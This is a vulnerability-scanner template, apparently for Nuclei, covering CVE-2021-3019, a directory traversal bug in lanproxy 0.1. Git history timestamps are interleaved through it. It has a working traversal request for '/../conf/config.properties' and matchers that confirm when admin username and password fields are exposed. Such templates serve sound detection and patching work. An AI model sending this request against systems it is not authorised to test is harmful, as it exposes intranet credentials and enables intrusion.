2021-01-30 12:22:35 +00:00
id : CVE-2021-3019
info :
2022-04-07 13:53:15 +00:00
name : ffay lanproxy Directory Traversal
2021-01-30 12:22:35 +00:00
author : pikpikcu
2021-09-10 11:26:40 +00:00
severity : high
2022-04-22 10:38:41 +00:00
description : ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest patch or upgrade to a version that has fixed the vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-03-24 06:48:11 +00:00
- https://github.com/ffay/lanproxy/commits/master
- https://github.com/maybe-why-not/lanproxy/issues/1
2022-04-07 13:53:15 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-3019
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-3019
cwe-id : CWE-22
2023-10-14 11:27:55 +00:00
epss-score : 0.01044
2023-10-18 16:26:30 +00:00
epss-percentile : 0.82303
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:lanproxy_project:lanproxy:0.1:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : lanproxy_project
product : lanproxy
tags : cve,cve2021,lanproxy,lfi
2021-01-30 12:22:35 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-01-30 12:22:35 +00:00
- method : GET
path :
- "{{BaseURL}}/../conf/config.properties"
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-01-30 12:22:35 +00:00
words :
- "application/octet-stream"
condition : and
2023-07-11 19:49:27 +00:00
2021-01-30 12:22:35 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-01-30 12:22:35 +00:00
words :
- "config.admin.username"
- "config.admin.password"
condition : and
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200